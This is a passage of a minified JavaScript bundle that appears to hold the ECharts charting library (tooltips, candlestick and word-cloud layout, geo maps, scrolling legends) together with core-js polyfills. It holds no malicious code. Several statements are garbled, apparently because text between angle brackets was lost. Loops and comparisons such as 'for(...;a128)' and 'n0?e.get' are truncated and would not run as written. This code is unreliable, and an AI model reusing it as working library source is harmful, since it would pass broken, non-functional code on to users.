l=this;i.onmouseenter=function(){l._enterable&&(clearTimeout(l._hideTimeout),l._show=!0),l._inContent=!0},i.onmousemove=function(e){if(e=e||window.event,!l._enterable){var t=r.handler,n=r.painter.getViewportRoot();o.normalizeEvent(n,e,!0),t.dispatch("mousemove",e)}},i.onmouseleave=function(){l._enterable&&l._show&&l.hideLater(l._hideDelay),l._inContent=!1}}v.prototype={constructor:v,_enterable:!0,update:function(e){var t=this._container,n=t.currentStyle||document.defaultView.getComputedStyle(t),i=t.style;"absolute"!==i.position&&"absolute"!==n.position&&(i.position="relative");var r=e.get("alwaysShowContent");r&&this._moveTooltipIfResized()},_moveTooltipIfResized:function(){var e=this._styleCoord[2],t=this._styleCoord[3],n=e*this._zr.getWidth(),i=t*this._zr.getHeight();this.moveTo(n,i)},show:function(e){clearTimeout(this._hideTimeout);var t=this.el,n=this._styleCoord;t.style.cssText=d+g(e)+";left:"+n[0]+"px;top:"+n[1]+"px;"+(e.get("extraCssText")||""),t.style.display=t.innerHTML?"block":"none",t.style.pointerEvents=this._enterable?"auto":"none",this._show=!0},setContent:function(e){this.el.innerHTML=null==e?"":e},setEnterable:function(e){this._enterable=e},getSize:function(){var e=this.el;return[e.clientWidth,e.clientHeight]},moveTo:function(e,t){var n=this._styleCoord;m(n,this._zr,this._appendToBody,e,t);var i=this.el.style;i.left=n[0]+"px",i.top=n[1]+"px"},hide:function(){this.el.style.display="none",this._show=!1},hideLater:function(e){!this._show||this._inContent&&this._enterable||(e?(this._hideDelay=e,this._show=!1,this._hideTimeout=setTimeout(i.bind(this.hide,this),e)):this.hide())},isShow:function(){return this._show},dispose:function(){this.el.parentNode.removeChild(this.el)},getOuterSize:function(){var e=this.el.clientWidth,t=this.el.clientHeight;if(document.defaultView&&document.defaultView.getComputedStyle){var n=document.defaultView.getComputedStyle(this.el);n&&(e+=parseInt(n.borderLeftWidth,10)+parseInt(n.borderRightWidth,10),t+=parseInt(n.borderTopWidth,10)+parseInt(n.borderBottomWidth,10))}return{width:e,height:t}}};var y=v;e.exports=y},"07e6":function(e,t,n){n("4d85"),n("a753")},"0808":function(e,t,n){},"0817":function(e,t,n){var i=n("3eba");n("f306"),n("0046"),n("60d7");var r=n("ab71");i.registerVisual(r)},"085d":function(e,t,n){var i=n("3eba");n("bd92"),n("19e2");var r=n("eabf"),o=n("4c99"),a=n("09b1");i.registerPreprocessor(r),i.registerVisual(o),i.registerLayout(a)},"08c3":function(e,t,n){var i=n("6d8b"),r=n("84ce"),o=function(e,t,n,i){r.call(this,e,t,n),this.type=i||"value",this.model=null};o.prototype={constructor:o,getLabelModel:function(){return this.model.getModel("label")},isHorizontal:function(){return"horizontal"===this.model.get("orient")}},i.inherits(o,r);var a=o;e.exports=a},"0983":function(e,t,n){var i=n("c901");e.exports=function(e){return Object(i(e))}},"09b1":function(e,t,n){var i=n("2306"),r=i.subPixelOptimize,o=n("cccd"),a=n("3842"),s=a.parsePercent,l=n("6d8b"),u=l.retrieve2,c="undefined"!==typeof Float32Array?Float32Array:Array,h={seriesType:"candlestick",plan:o(),reset:function(e){var t=e.coordinateSystem,n=e.getData(),i=f(e,n),o=0,a=1,s=["x","y"],l=n.mapDimension(s[o]),u=n.mapDimension(s[a],!0),h=u[0],p=u[1],g=u[2],m=u[3];if(n.setLayout({candleWidth:i,isSimpleBox:i<=1.3}),!(null==l||u.length<4))return{progress:e.pipelineContext.large?y:v};function v(e,n){var s;while(null!=(s=e.next())){var u=n.get(l,s),c=n.get(h,s),f=n.get(p,s),v=n.get(g,s),y=n.get(m,s),_=Math.min(c,f),b=Math.max(c,f),x=A(_,u),w=A(b,u),k=A(v,u),S=A(y,u),M=[];C(M,w,0),C(M,x,1),M.push(I(S),I(w),I(k),I(x)),n.setItemLayout(s,{sign:d(n,s,c,f,p),initBaseline:c>f?w[a]:x[a],ends:M,brushRect:T(v,y,u)})}function A(e,n){var i=[];return i[o]=n,i[a]=e,isNaN(n)||isNaN(e)?[NaN,NaN]:t.dataToPoint(i)}function C(e,t,n){var a=t.slice(),s=t.slice();a[o]=r(a[o]+i/2,1,!1),s[o]=r(s[o]-i/2,1,!0),n?e.push(a,s):e.push(s,a)}function T(e,t,n){var r=A(e,n),s=A(t,n);return r[o]-=i/2,s[o]-=i/2,{x:r[0],y:r[1],width:a?i:s[0]-r[0],height:a?s[1]-r[1]:i}}function I(e){return e[o]=r(e[o],1),e}}function y(e,n){var i,r,s=new c(4*e.count),u=0,f=[],v=[];while(null!=(r=e.next())){var y=n.get(l,r),_=n.get(h,r),b=n.get(p,r),x=n.get(g,r),w=n.get(m,r);isNaN(y)||isNaN(x)||isNaN(w)?(s[u++]=NaN,u+=3):(s[u++]=d(n,r,_,b,p),f[o]=y,f[a]=x,i=t.dataToPoint(f,null,v),s[u++]=i?i[0]:NaN,s[u++]=i?i[1]:NaN,f[a]=w,i=t.dataToPoint(f,null,v),s[u++]=i?i[1]:NaN)}n.setLayout("largePoints",s)}}};function d(e,t,n,i,r){var o;return o=n>i?-1:n0?e.get(r,t-1)<=i?1:-1:1,o}function f(e,t){var n,i=e.getBaseAxis(),r="category"===i.type?i.getBandWidth():(n=i.getExtent(),Math.abs(n[1]-n[0])/t.count()),o=s(u(e.get("barMaxWidth"),r),r),a=s(u(e.get("barMinWidth"),1),r),l=e.get("barWidth");return null!=l?s(l,r):Math.max(Math.min(r/2,o),a)}e.exports=h},"0a4f":function(e,t,n){var i=n("3eba"),r=n("f934");n("365b"),n("c03d");var o=n("793f");if(!o.isSupported)throw new Error("Sorry your browser not support wordCloud");function a(e){for(var t=e.getContext("2d"),n=t.getImageData(0,0,e.width,e.height),i=t.createImageData(n),r=0,o=0,a=0;a128){var l=n.data[a]+n.data[a+1]+n.data[a+2];r+=l,++o}}var u=r/o;for(a=0;au?(i.data[a]=0,i.data[a+1]=0,i.data[a+2]=0,i.data[a+3]=0):(i.data[a]=255,i.data[a+1]=255,i.data[a+2]=255,i.data[a+3]=255)}t.putImageData(i,0,0)}i.registerLayout((function(e,t){e.eachSeriesByType("wordCloud",(function(n){var s=r.getLayoutRect(n.getBoxLayoutParams(),{width:t.getWidth(),height:t.getHeight()}),l=n.getData(),u=document.createElement("canvas");u.width=s.width,u.height=s.height;var c=u.getContext("2d"),h=n.get("maskImage");if(h)try{c.drawImage(h,0,0,u.width,u.height),a(u)}catch(y){console.error("Invalid mask image"),console.error(y.toString())}var d=n.get("sizeRange"),f=n.get("rotationRange"),p=l.getDataExtent("value"),g=Math.PI/180,m=n.get("gridSize");function v(e){var t=e.detail.item;e.detail.drawn&&n.layoutInstance.ondraw&&(e.detail.drawn.gx+=s.x/m,e.detail.drawn.gy+=s.y/m,n.layoutInstance.ondraw(t[0],t[1],t[2],e.detail.drawn))}o(u,{list:l.mapArray("value",(function(e,t){var n=l.getItemModel(t);return[l.getName(t),n.get("textStyle.normal.textSize",!0)||i.number.linearMap(e,p,d),t]})).sort((function(e,t){return t[1]-e[1]})),fontFamily:n.get("textStyle.normal.fontFamily")||n.get("textStyle.emphasis.fontFamily")||e.get("textStyle.fontFamily"),fontWeight:n.get("textStyle.normal.fontWeight")||n.get("textStyle.emphasis.fontWeight")||e.get("textStyle.fontWeight"),gridSize:m,ellipticity:s.height/s.width,minRotation:f[0]*g,maxRotation:f[1]*g,clearCanvas:!h,rotateRatio:1,rotationStep:n.get("rotationStep")*g,drawOutOfBound:n.get("drawOutOfBound"),shuffle:!1,shape:n.get("shape")}),u.addEventListener("wordclouddrawn",v),n.layoutInstance&&n.layoutInstance.dispose(),n.layoutInstance={ondraw:null,dispose:function(){u.removeEventListener("wordclouddrawn",v),u.addEventListener("wordclouddrawn",(function(e){e.preventDefault()}))}}}))})),i.registerPreprocessor((function(e){var t=(e||{}).series;!i.util.isArray(t)&&(t=t?[t]:[]);var n=["shadowColor","shadowBlur","shadowOffsetX","shadowOffsetY"];function r(e){e&&i.util.each(n,(function(t){e.hasOwnProperty(t)&&(e["text"+i.format.capitalFirst(t)]=e[t])}))}i.util.each(t,(function(e){if(e&&"wordCloud"===e.type){var t=e.textStyle||{};r(t.normal),r(t.emphasis)}}))}))},"0a6d":function(e,t,n){n("e4d1"),n("7f72")},"0ae2":function(e,t,n){var i=n("9876"),r=n("fed5"),o=n("1917");e.exports=function(e){var t=i(e),n=r.f;if(n){var a,s=n(e),l=o.f,u=0;while(s.length>u)l.call(e,a=s[u++])&&t.push(a)}return t}},"0b44":function(e,t,n){var i=n("607d"),r=function(){this._track=[]};function o(e){var t=e[1][0]-e[0][0],n=e[1][1]-e[0][1];return Math.sqrt(t*t+n*n)}function a(e){return[(e[0][0]+e[1][0])/2,(e[0][1]+e[1][1])/2]}r.prototype={constructor:r,recognize:function(e,t,n){return this._doTrack(e,t,n),this._recognize(e)},clear:function(){return this._track.length=0,this},_doTrack:function(e,t,n){var r=e.touches;if(r){for(var o={points:[],touches:[],target:t,event:e},a=0,s=r.length;a1&&i&&i.length>1){var s=o(i)/o(r);!isFinite(s)&&(s=1),t.pinchScale=s;var l=a(i);return t.pinchX=l[0],t.pinchY=l[1],{type:"pinch",target:e[0].target,event:t}}}}},l=r;e.exports=l},"0b4b":function(e,t,n){n("d28f"),n("f14c"),n("0ee7"),n("ebf9")},"0b99":function(e,t,n){"use strict";var i=n("19fa")(!0);n("393a")(String,"String",(function(e){this._t=String(e),this._i=0}),(function(){var e,t=this._t,n=this._i;return n>=t.length?{value:void 0,done:!0}:(e=i(t,n),this._i+=e.length,{value:e,done:!1})}))},"0bad":function(e,t,n){e.exports=!n("4b8b")((function(){return 7!=Object.defineProperty({},"a",{get:function(){return 7}}).a}))},"0c12":function(e,t){function n(){}function i(e,t,n,i){for(var r=0,o=t.length,a=0,s=0;r=a&&h+1>=s){for(var d=[],f=0;f=a&&f+1>=s)return i(o,u.components,t,e);c[n]=u}else c[n]=void 0}l++}while(l<=u){var g=p();if(g)return g}},pushComponent:function(e,t,n){var i=e[e.length-1];i&&i.added===t&&i.removed===n?e[e.length-1]={count:i.count+1,added:t,removed:n}:e.push({count:1,added:t,removed:n})},extractCommon:function(e,t,n,i){var r=t.length,o=n.length,a=e.newPos,s=a-i,l=0;while(a+1r&&(r=t);var s=r%2?r+2:r+3;a=[];for(var l=0;l=0)&&(P=e);var N=new l.Text({position:I(t.center.slice()),scale:[1/m.scale[0],1/m.scale[1]],z2:10,silent:!0});if(l.setLabelStyle(N.style,N.hoverStyle={},_,b,{labelFetcher:P,labelDataIndex:R,defaultText:t.name,useInsideStyle:!1},{textAlign:"center",textVerticalAlign:"middle"}),!y){var z=[1/c[0],1/c[1]];l.updateProps(N,{scale:z},e)}n.add(N)}if(s)s.setItemGraphicEl(o,n);else{u=e.getRegionModel(t.name);r.eventData={componentType:"geo",componentIndex:e.componentIndex,geoIndex:e.componentIndex,name:t.name,region:u&&u.option||{}}}var F=n.__regions||(n.__regions=[]);F.push(t),n.highDownSilentOnTouch=!!e.get("selectedMode"),l.setHoverStyle(n,v),h.add(n)})),this._updateController(e,t,n),p(this,e,h,n,r),g(e,h)},remove:function(){this._regionsGroup.removeAll(),this._backgroundGroup.removeAll(),this._controller.dispose(),this._mapName&&u.removeGraphic(this._mapName,this.uid),this._mapName=null,this._controllerHost={}},_updateBackground:function(e){var t=e.map;this._mapName!==t&&i.each(u.makeGraphic(t,this.uid),(function(e){this._backgroundGroup.add(e)}),this),this._mapName=t},_updateController:function(e,t,n){var r=e.coordinateSystem,a=this._controller,l=this._controllerHost;l.zoomLimit=e.get("scaleLimit"),l.zoom=r.getZoom(),a.enable(e.get("roam")||!1);var u=e.mainType;function c(){var t={type:"geoRoam",componentType:u};return t[u+"Id"]=e.id,t}a.off("pan").on("pan",(function(e){this._mouseDownFlag=!1,o.updateViewOnPan(l,e.dx,e.dy),n.dispatchAction(i.extend(c(),{dx:e.dx,dy:e.dy}))}),this),a.off("zoom").on("zoom",(function(e){if(this._mouseDownFlag=!1,o.updateViewOnZoom(l,e.scale,e.originX,e.originY),n.dispatchAction(i.extend(c(),{zoom:e.scale,originX:e.originX,originY:e.originY})),this._updateGroup){var t=this.group.scale;this._regionsGroup.traverse((function(e){"text"===e.type&&e.attr("scale",[1/t[0],1/t[1]])}))}}),this),a.setPointerChecker((function(t,i,o){return r.getViewRectAfterRoam().contain(i,o)&&!s(t,n,e)}))}};var v=m;e.exports=v},"0cde":function(e,t,n){var i=n("1687"),r=n("401b"),o=i.identity,a=5e-5;function s(e){return e>a||e<-a}var l=function(e){e=e||{},e.position||(this.position=[0,0]),null==e.rotation&&(this.rotation=0),e.scale||(this.scale=[1,1]),this.origin=this.origin||null},u=l.prototype;u.transform=null,u.needLocalTransform=function(){return s(this.rotation)||s(this.position[0])||s(this.position[1])||s(this.scale[0]-1)||s(this.scale[1]-1)};var c=[];u.updateTransform=function(){var e=this.parent,t=e&&e.transform,n=this.needLocalTransform(),r=this.transform;if(n||t){r=r||i.create(),n?this.getLocalTransform(r):o(r),t&&(n?i.mul(r,e.transform,r):i.copy(r,e.transform)),this.transform=r;var a=this.globalScaleRatio;if(null!=a&&1!==a){this.getGlobalScale(c);var s=c[0]<0?-1:1,l=c[1]<0?-1:1,u=((c[0]-s)*a+s)/c[0]||0,h=((c[1]-l)*a+l)/c[1]||0;r[0]*=u,r[1]*=u,r[2]*=h,r[3]*=h}this.invTransform=this.invTransform||i.create(),i.invert(this.invTransform,r)}else r&&o(r)},u.getLocalTransform=function(e){return l.getLocalTransform(this,e)},u.setTransform=function(e){var t=this.transform,n=e.dpr||1;t?e.setTransform(n*t[0],n*t[1],n*t[2],n*t[3],n*t[4],n*t[5]):e.setTransform(n,0,0,n,0,0)},u.restoreTransform=function(e){var t=e.dpr||1;e.setTransform(t,0,0,t,0,0)};var h=[],d=i.create();u.setLocalTransform=function(e){if(e){var t=e[0]*e[0]+e[1]*e[1],n=e[2]*e[2]+e[3]*e[3],i=this.position,r=this.scale;s(t-1)&&(t=Math.sqrt(t)),s(n-1)&&(n=Math.sqrt(n)),e[0]<0&&(t=-t),e[3]<0&&(n=-n),i[0]=e[4],i[1]=e[5],r[0]=t,r[1]=n,this.rotation=Math.atan2(-e[1]/n,e[0]/t)}},u.decomposeTransform=function(){if(this.transform){var e=this.parent,t=this.transform;e&&e.transform&&(i.mul(h,e.invTransform,t),t=h);var n=this.origin;n&&(n[0]||n[1])&&(d[4]=n[0],d[5]=n[1],i.mul(h,t,d),h[4]-=n[0],h[5]-=n[1],t=h),this.setLocalTransform(t)}},u.getGlobalScale=function(e){var t=this.transform;return e=e||[],t?(e[0]=Math.sqrt(t[0]*t[0]+t[1]*t[1]),e[1]=Math.sqrt(t[2]*t[2]+t[3]*t[3]),t[0]<0&&(e[0]=-e[0]),t[3]<0&&(e[1]=-e[1]),e):(e[0]=1,e[1]=1,e)},u.transformCoordToLocal=function(e,t){var n=[e,t],i=this.invTransform;return i&&r.applyTransform(n,n,i),n},u.transformCoordToGlobal=function(e,t){var n=[e,t],i=this.transform;return i&&r.applyTransform(n,n,i),n},l.getLocalTransform=function(e,t){t=t||[],o(t);var n=e.origin,r=e.scale||[1,1],a=e.rotation||0,s=e.position||[0,0];return n&&(t[4]-=n[0],t[5]-=n[1]),i.scale(t,t,r),a&&i.rotate(t,t,a),n&&(t[4]+=n[0],t[5]+=n[1]),t[4]+=s[0],t[5]+=s[1],t};var f=l;e.exports=f},"0cfb":function(e,t,n){var i=n("83ab"),r=n("d039"),o=n("cc12");e.exports=!i&&!r((function(){return 7!=Object.defineProperty(o("div"),"a",{get:function(){return 7}}).a}))},"0da8":function(e,t,n){var i=n("19eb"),r=n("9850"),o=n("6d8b"),a=n("5e76");function s(e){i.call(this,e)}s.prototype={constructor:s,type:"image",brush:function(e,t){var n=this.style,i=n.image;n.bind(e,this,t);var r=this._image=a.createOrUpdateImage(i,this._image,this,this.onload);if(r&&a.isImageReady(r)){var o=n.x||0,s=n.y||0,l=n.width,u=n.height,c=r.width/r.height;if(null==l&&null!=u?l=u*c:null==u&&null!=l?u=l/c:null==l&&null==u&&(l=r.width,u=r.height),this.setTransform(e),n.sWidth&&n.sHeight){var h=n.sx||0,d=n.sy||0;e.drawImage(r,h,d,n.sWidth,n.sHeight,o,s,l,u)}else if(n.sx&&n.sy){h=n.sx,d=n.sy;var f=l-h,p=u-d;e.drawImage(r,h,d,f,p,o,s,l,u)}else e.drawImage(r,o,s,l,u);null!=n.text&&(this.restoreTransform(e),this.drawRectText(e,this.getBoundingRect()))}},getBoundingRect:function(){var e=this.style;return this._rect||(this._rect=new r(e.x||0,e.y||0,e.width||0,e.height||0)),this._rect}},o.inherits(s,i);var l=s;e.exports=l},"0e0f":function(e,t,n){var i=n("5f14"),r=n("6d8b");function o(e,t){e.eachSeriesByType("sankey",(function(e){var t=e.getGraph(),n=t.nodes;if(n.length){var o=1/0,a=-1/0;r.each(n,(function(e){var t=e.getLayout().value;ta&&(a=t)})),r.each(n,(function(t){var n=new i({type:"color",mappingMethod:"linear",dataExtent:[o,a],visual:e.get("color")}),r=n.mapValueToVisual(t.getLayout().value),s=t.getModel().get("itemStyle.color");null!=s?t.setVisual("color",s):t.setVisual("color",r)}))}}))}e.exports=o},"0e15":function(e,t,n){var i=n("597f");e.exports=function(e,t,n){return void 0===n?i(e,t,!1):i(e,n,!1!==t)}},"0ee7":function(e,t,n){var i=n("6d8b"),r=n("2306"),o=n("f934"),a=n("5e97"),s=r.Group,l=["width","height"],u=["x","y"],c=a.extend({type:"legend.scroll",newlineDisabled:!0,init:function(){c.superCall(this,"init"),this._currentIndex=0,this.group.add(this._containerGroup=new s),this._containerGroup.add(this.getContentGroup()),this.group.add(this._controllerGroup=new s),this._showController},resetInner:function(){c.superCall(this,"resetInner"),this._controllerGroup.removeAll(),this._containerGroup.removeClipPath(),this._containerGroup.__rectSize=null},renderInner:function(e,t,n,o,a,s,l){var u=this;c.superCall(this,"renderInner",e,t,n,o,a,s,l);var h=this._controllerGroup,d=t.get("pageIconSize",!0);i.isArray(d)||(d=[d,d]),p("pagePrev",0);var f=t.getModel("pageTextStyle");function p(e,n){var a=e+"DataIndex",s=r.createIcon(t.get("pageIcons",!0)[t.getOrient().name][n],{onclick:i.bind(u._pageGo,u,a,t,o)},{x:-d[0]/2,y:-d[1]/2,width:d[0],height:d[1]});s.name=e,h.add(s)}h.add(new r.Text({name:"pageText",style:{textFill:f.getTextColor(),font:f.getFont(),textVerticalAlign:"middle",textAlign:"center"},silent:!0})),p("pageNext",1)},layoutInner:function(e,t,n,r,a,s){var c=this.getSelectorGroup(),h=e.getOrient().index,d=l[h],f=u[h],p=l[1-h],g=u[1-h];a&&o.box("horizontal",c,e.get("selectorItemGap",!0));var m=e.get("selectorButtonGap",!0),v=c.getBoundingRect(),y=[-v.x,-v.y],_=i.clone(n);a&&(_[d]=n[d]-v[d]-m);var b=this._layoutContentAndController(e,r,_,h,d,p,g);if(a){if("end"===s)y[h]+=b[d]+m;else{var x=v[d]+m;y[h]-=x,b[f]-=x}b[d]+=v[d]+m,y[1-h]+=b[g]+b[p]/2-v[p]/2,b[p]=Math.max(b[p],v[p]),b[g]=Math.min(b[g],v[g]+y[1-h]),c.attr("position",y)}return b},_layoutContentAndController:function(e,t,n,a,s,l,u){var c=this.getContentGroup(),h=this._containerGroup,d=this._controllerGroup;o.box(e.get("orient"),c,e.get("itemGap"),a?n.width:null,a?null:n.height),o.box("horizontal",d,e.get("pageButtonItemGap",!0));var f=c.getBoundingRect(),p=d.getBoundingRect(),g=this._showController=f[s]>n[s],m=[-f.x,-f.y];t||(m[a]=c.position[a]);var v=[0,0],y=[-p.x,-p.y],_=i.retrieve2(e.get("pageButtonGap",!0),e.get("itemGap",!0));if(g){var b=e.get("pageButtonPosition",!0);"end"===b?y[a]+=n[s]-p[s]:v[a]+=p[s]+_}y[1-a]+=f[l]/2-p[l]/2,c.attr("position",m),h.attr("position",v),d.attr("position",y);var x={x:0,y:0};if(x[s]=g?n[s]:f[s],x[l]=Math.max(f[l],p[l]),x[u]=Math.min(0,p[u]+y[1-a]),h.__rectSize=n[s],g){var w={x:0,y:0};w[s]=Math.max(n[s]-p[s]-_,0),w[l]=x[l],h.setClipPath(new r.Rect({shape:w})),h.__rectSize=w[s]}else d.eachChild((function(e){e.attr({invisible:!0,silent:!0})}));var k=this._getPageInfo(e);return null!=k.pageIndex&&r.updateProps(c,{position:k.contentPosition},!!g&&e),this._updatePageInfoView(e,k),x},_pageGo:function(e,t,n){var i=this._getPageInfo(t)[e];null!=i&&n.dispatchAction({type:"legendScroll",scrollDataIndex:i,legendId:t.id})},_updatePageInfoView:function(e,t){var n=this._controllerGroup;i.each(["pagePrev","pageNext"],(function(i){var r=null!=t[i+"DataIndex"],o=n.childOfName(i);o&&(o.setStyle("fill",r?e.get("pageIconColor",!0):e.get("pageIconInactiveColor",!0)),o.cursor=r?"pointer":"default")}));var r=n.childOfName("pageText"),o=e.get("pageFormatter"),a=t.pageIndex,s=null!=a?a+1:0,l=t.pageCount;r&&o&&r.setStyle("text",i.isString(o)?o.replace("{current}",s).replace("{total}",l):o({current:s,total:l}))},_getPageInfo:function(e){var t=e.get("scrollDataIndex",!0),n=this.getContentGroup(),i=this._containerGroup.__rectSize,r=e.getOrient().index,o=l[r],a=u[r],s=this._findTargetItemIndex(t),c=n.children(),h=c[s],d=c.length,f=d?1:0,p={contentPosition:n.position.slice(),pageCount:f,pageIndex:f-1,pagePrevDataIndex:null,pageNextDataIndex:null};if(!h)return p;var g=b(h);p.contentPosition[r]=-g.s;for(var m=s+1,v=g,y=g,_=null;m<=d;++m)_=b(c[m]),(!_&&y.e>v.s+i||_&&!x(_,v.s))&&(v=y.i>v.i?y:_,v&&(null==p.pageNextDataIndex&&(p.pageNextDataIndex=v.i),++p.pageCount)),y=_;for(m=s-1,v=g,y=g,_=null;m>=-1;--m)_=b(c[m]),_&&x(y,_.s)||!(v.i=t&&e.s<=t+i}},_findTargetItemIndex:function(e){if(!this._showController)return 0;var t,n,i=this.getContentGroup();return i.eachChild((function(i,r){var o=i.__legendDataIndex;null==n&&null!=o&&(n=r),o===e&&(t=r)})),null!=t?t:n}}),h=c;e.exports=h},"0f55":function(e,t,n){var i=n("6d8b"),r=n("84ce"),o=function(e,t,n,i,o){r.call(this,e,t,n),this.type=i||"value",this.axisIndex=o};o.prototype={constructor:o,model:null,isHorizontal:function(){return"horizontal"!==this.coordinateSystem.getModel().get("layout")}},i.inherits(o,r);var a=o;e.exports=a},"0f99":function(e,t,n){var i=n("4e08"),r=(i.__DEV__,n("e0d3")),o=r.makeInner,a=r.getDataItemValue,s=n("6d8b"),l=s.createHashMap,u=s.each,c=s.map,h=s.isArray,d=s.isString,f=s.isObject,p=s.isTypedArray,g=s.isArrayLike,m=s.extend,v=(s.assert,n("ec6f")),y=n("93d0"),_=y.SOURCE_FORMAT_ORIGINAL,b=y.SOURCE_FORMAT_ARRAY_ROWS,x=y.SOURCE_FORMAT_OBJECT_ROWS,w=y.SOURCE_FORMAT_KEYED_COLUMNS,k=y.SOURCE_FORMAT_UNKNOWN,S=y.SOURCE_FORMAT_TYPED_ARRAY,M=y.SERIES_LAYOUT_BY_ROW,A={Must:1,Might:2,Not:3},C=o();function T(e){var t=e.option.source,n=k;if(p(t))n=S;else if(h(t)){0===t.length&&(n=b);for(var i=0,r=t.length;i0&&(s=this.getLineLength(i)/u*1e3),s!==this._period||l!==this._loop){i.stopAnimation();var d=c;h&&(d=c(n)),i.__t>0&&(d=-s*i.__t),i.__t=0;var f=i.animate("",l).when(s,{__t:1}).delay(d).during((function(){r.updateSymbolPosition(i)}));l||f.done((function(){r.remove(i)})),f.start()}this._period=s,this._loop=l}},h.getLineLength=function(e){return l.dist(e.__p1,e.__cp1)+l.dist(e.__cp1,e.__p2)},h.updateAnimationPoints=function(e,t){e.__p1=t[0],e.__p2=t[1],e.__cp1=t[2]||[(t[0][0]+t[1][0])/2,(t[0][1]+t[1][1])/2]},h.updateData=function(e,t,n){this.childAt(0).updateData(e,t,n),this._updateEffectSymbol(e,t)},h.updateSymbolPosition=function(e){var t=e.__p1,n=e.__p2,i=e.__cp1,r=e.__t,o=e.position,a=[o[0],o[1]],s=u.quadraticAt,c=u.quadraticDerivativeAt;o[0]=s(t[0],i[0],n[0],r),o[1]=s(t[1],i[1],n[1],r);var h=c(t[0],i[0],n[0],r),d=c(t[1],i[1],n[1],r);if(e.rotation=-Math.atan2(d,h)-Math.PI/2,"line"===this._symbolType||"rect"===this._symbolType||"roundRect"===this._symbolType)if(void 0!==e.__lastT&&e.__lastTt[0][1]&&(t[0][1]=o[0]),o[1]t[1][1]&&(t[1][1]=o[1])}return t&&w(t)}};function w(e){return new o(e[0][0],e[1][0],e[0][1]-e[0][0],e[1][1]-e[1][0])}t.layoutCovers=p},"10d5":function(e,t,n){e.exports=n("250d")},"10db":function(e,t){e.exports=function(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}},1111:function(e,t,n){var i=n("3eba");n("67a8"),n("4784");var r=n("7f96"),o=n("87c3");i.registerVisual(r("effectScatter","circle")),i.registerLayout(o("effectScatter"))},"11b0":function(e,t,n){function i(e){if("undefined"!==typeof Symbol&&null!=e[Symbol.iterator]||null!=e["@@iterator"])return Array.from(e)}n("a4d3"),n("e01a"),n("d3b7"),n("d28b"),n("3ca3"),n("ddb0"),n("a630"),e.exports=i,e.exports.__esModule=!0,e.exports["default"]=e.exports},1276:function(e,t,n){"use strict";var i=n("d784"),r=n("44e7"),o=n("825a"),a=n("1d80"),s=n("4840"),l=n("8aa5"),u=n("50c4"),c=n("14c3"),h=n("9263"),d=n("d039"),f=[].push,p=Math.min,g=4294967295,m=!d((function(){return!RegExp(g,"y")}));i("split",2,(function(e,t,n){var i;return i="c"=="abbc".split(/(b)*/)[1]||4!="test".split(/(?:)/,-1).length||2!="ab".split(/(?:ab)*/).length||4!=".".split(/(.?)(.?)/).length||".".split(/()()/).length>1||"".split(/.?/).length?function(e,n){var i=String(a(this)),o=void 0===n?g:n>>>0;if(0===o)return[];if(void 0===e)return[i];if(!r(e))return t.call(i,e,o);var s,l,u,c=[],d=(e.ignoreCase?"i":"")+(e.multiline?"m":"")+(e.unicode?"u":"")+(e.sticky?"y":""),p=0,m=new RegExp(e.source,d+"g");while(s=h.call(m,i)){if(l=m.lastIndex,l>p&&(c.push(i.slice(p,s.index)),s.length>1&&s.index=o))break;m.lastIndex===s.index&&m.lastIndex++}return p===i.length?!u&&m.test("")||c.push(""):c.push(i.slice(p)),c.length>o?c.slice(0,o):c}:"0".split(void 0,0).length?function(e,n){return void 0===e&&0===n?[]:t.call(this,e,n)}:t,[function(t,n){var r=a(this),o=void 0==t?void 0:t[e];return void 0!==o?o.call(t,r,n):i.call(String(r),t,n)},function(e,r){var a=n(i,e,this,r,i!==t);if(a.done)return a.value;var h=o(e),d=String(this),f=s(h,RegExp),v=h.unicode,y=(h.ignoreCase?"i":"")+(h.multiline?"m":"")+(h.unicode?"u":"")+(m?"y":"g"),_=new f(m?h:"^(?:"+h.source+")",y),b=void 0===r?g:r>>>0;if(0===b)return[];if(0===d.length)return null===c(_,d)?[d]:[];var x=0,w=0,k=[];while(w0&&!g.min?g.min=0:null!=g.min&&g.min<0&&!g.max&&(g.max=0);var m=c;if(null!=g.color&&(m=r.defaults({color:g.color},c)),g=r.merge(r.clone(g),{boundaryGap:e,splitNumber:t,scale:n,axisLine:i,axisTick:o,axisType:l,axisLabel:u,name:g.text,nameLocation:"end",nameGap:f,nameTextStyle:m,triggerEvent:p},!1),h||(g.name=""),"string"===typeof d){var v=g.name;g.name=d.replace("{value}",null!=v?v:"")}else"function"===typeof d&&(g.name=d(g.name,g));var y=r.extend(new a(g,null,this.ecModel),s);return y.mainType="radar",y.componentIndex=this.componentIndex,y}),this);this.getIndicatorModels=function(){return g}},defaultOption:{zlevel:0,z:0,center:["50%","50%"],radius:"75%",startAngle:90,name:{show:!0},boundaryGap:[0,0],splitNumber:5,nameGap:15,scale:!1,shape:"polygon",axisLine:r.merge({lineStyle:{color:"#bbb"}},l.axisLine),axisLabel:u(l.axisLabel,!1),axisTick:u(l.axisTick,!1),axisType:"interval",splitLine:u(l.splitLine,!0),splitArea:u(l.splitArea,!0),indicator:[]}}),h=c;e.exports=h},1792:function(e,t){var n={"南海诸岛":[32,80],"广东":[0,-10],"香港":[10,5],"澳门":[-10,10],"天津":[5,5]};function i(e,t){if("china"===e){var i=n[t.name];if(i){var r=t.center;r[0]+=i[0]/10.5,r[1]+=-i[1]/14}}}e.exports=i},"17b8":function(e,t,n){var i=n("3014"),r=i.extend({type:"series.bar",dependencies:["grid","polar"],brushSelector:"rect",getProgressive:function(){return!!this.get("large")&&this.get("progressive")},getProgressiveThreshold:function(){var e=this.get("progressiveThreshold"),t=this.get("largeThreshold");return t>e&&(e=t),e},defaultOption:{clip:!0,roundCap:!1,showBackground:!1,backgroundStyle:{color:"rgba(180, 180, 180, 0.2)",borderColor:null,borderWidth:0,borderType:"solid",borderRadius:0,shadowBlur:0,shadowColor:null,shadowOffsetX:0,shadowOffsetY:0,opacity:1}}});e.exports=r},"17c2":function(e,t,n){"use strict";var i=n("b727").forEach,r=n("a640"),o=n("ae40"),a=r("forEach"),s=o("forEach");e.exports=a&&s?[].forEach:function(e){return i(this,e,arguments.length>1?arguments[1]:void 0)}},"17d6":function(e,t,n){var i=n("6d8b"),r=n("22d1"),o=n("e0d3"),a=o.makeInner,s=a(),l=i.each;function u(e,t,n){if(!r.node){var i=t.getZr();s(i).records||(s(i).records={}),c(i,t);var o=s(i).records[e]||(s(i).records[e]={});o.handler=n}}function c(e,t){function n(n,i){e.on(n,(function(n){var 